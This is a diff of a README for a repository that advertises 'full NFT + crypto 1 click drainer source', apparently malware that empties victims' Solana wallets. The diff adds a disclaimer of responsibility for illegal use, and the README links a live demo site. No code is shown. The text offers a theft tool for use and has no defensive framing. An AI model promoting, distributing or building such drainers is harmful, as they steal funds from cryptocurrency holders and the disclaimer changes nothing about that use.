l0stlog/SOLANA-NFT-DRAINER-LEAKED-OP-PATCHED/README.md

-# 😱🥶 FULL NFT + CRYPTO 1 CLICK DRAINER SOURCE😱🥶
+# 😱🥶 FULL NFT + CRYPTO 1 CLICK DRAINER SOURCE ( I AM NOT RESPONSIBLE FOR ANY ILLEGAL USE OF THIS TOOL )

 # DEMO : https://solana-drainer.netlify.app/